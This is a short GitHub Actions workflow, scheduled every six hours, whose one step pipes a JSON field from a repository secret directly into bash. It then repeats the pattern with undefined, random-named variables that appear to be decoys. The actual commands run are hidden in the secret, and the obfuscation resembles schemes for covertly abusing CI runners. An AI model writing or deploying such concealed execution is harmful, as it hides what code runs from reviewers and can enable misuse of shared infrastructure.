name: fuxiangrongliang
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'
jobs:  # 18227
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fuxiangrongliang
        env:
          i59: ${{ secrets.i59 }}
        run: |
          echo $i59 | jq -r .r55 | /bin/bash
          echo $ncf7391 | jq -r .tnav22933 | /bin/bash
          echo $h5983 | jq -r .n90523 | /bin/bash
          echo $rztj40490 | jq -r .fpft65117 | /bin/bash
          echo $tgn149 | jq -r .w27132 | /bin/bash
          echo $lu4858 | jq -r .x94 | /bin/bash
          echo $lzg9 | jq -r .z09 | /bin/bash
          echo $cf4693 | jq -r .jb83 | /bin/bash

